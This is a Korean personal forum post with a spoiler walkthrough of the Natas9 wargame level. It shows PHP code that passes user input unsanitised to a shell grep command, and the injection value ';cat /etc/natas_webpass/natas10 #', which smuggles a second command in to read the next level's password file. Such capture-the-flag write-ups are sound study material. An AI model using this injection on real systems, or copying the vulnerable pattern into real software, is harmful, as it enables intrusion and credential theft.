메뉴 건너뛰기
노루발의 개인 게시판
글 수 56

(스포일러) Natas9 풀이

노루발

이번에도 소스코드를 보여준다:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>


넣은 값이 $key에 들어가고, "grep -i 넣은값 dictionary.txt" 명령어를 실행하여 결과를 보여준다.


경험으로 /etc/natas_webpass/natas10에 natas10의 패스워드가 저장되어 있음을 알고있고

dictionary.txt 대신 natas10 파일을 읽는다면 다음 계정의 패스워드를 획득할 수 있을 것이다:


;cat /etc/natas_webpass/natas10 #

위의 쿼리를 전송하면 natas10 계정의 패스워드를 얻을 수 있다.

이 게시물을
분류 :
망한거
조회 수 :
11
등록일 :
2020.03.06
23:46:41 (*.47.15.90)
엮인글 :
게시글 주소 :
https://hondoom.com/zbxe/index.php?mid=noru&document_srl=818051
목록
파일 첨부

여기에 파일을 끌어 놓거나 파일 첨부 버튼을 클릭하세요.

파일 크기 제한 : 0MB (허용 확장자 : *.*)

0개 첨부 됨 ( / )
옵션 :
:
:
List of Articles
번호 제목 글쓴이 날짜 조회 수
36 망한거 (스포일러) Natas14 풀이 노루발 2020-03-10 12
35 망한거 (스포일러) Natas13 풀이 노루발 2020-03-10 7
34 망한거 (스포일러) Natas12 풀이 노루발 2020-03-08 15
33 망한거 (스포일러) Natas11 풀이 노루발 2020-03-07 19
32 망한거 (스포일러) Natas10 풀이 노루발 2020-03-07 13
» 망한거 (스포일러) Natas9 풀이 노루발 2020-03-06 11
30 망한거 (스포일러) Natas8 풀이 노루발 2020-03-06 8
29 망한거 (스포일러) Natas7 풀이 노루발 2020-03-06 10
28 망한거 (스포일러) Natas6 풀이 노루발 2020-03-06 9
27 망한거 (스포일러) Natas5 풀이 노루발 2020-03-06 7
26 망한거 (스포일러) Natas4 풀이 노루발 2020-03-06 4
25 망한거 (스포일러) Natas3 풀이 노루발 2020-03-06 7
24 망한거 (스포일러) Natas2 풀이 노루발 2020-03-06 10
23 망한거 (스포일러) Natas1 풀이 노루발 2020-03-06 9
22 망한거 (스포일러) Natas0 풀이 노루발 2020-03-06 15
21 마실것 캄포트를 만들자 [1] 노루발 2019-08-07 30
20 오토바이 엔진에서 잡음이 나서 고쳤습니다. [3] 노루발 2019-07-31 75
19 오토바이 오토바이 체인 청소 [1] 노루발 2019-07-29 183
18 오토바이 (약혐) 오토바이 체인 청소전 사진 [4] 노루발 2019-07-27 60
17 오토바이 엔진오일 확인하고 옴 노루발 2019-07-21 27
목록
쓰기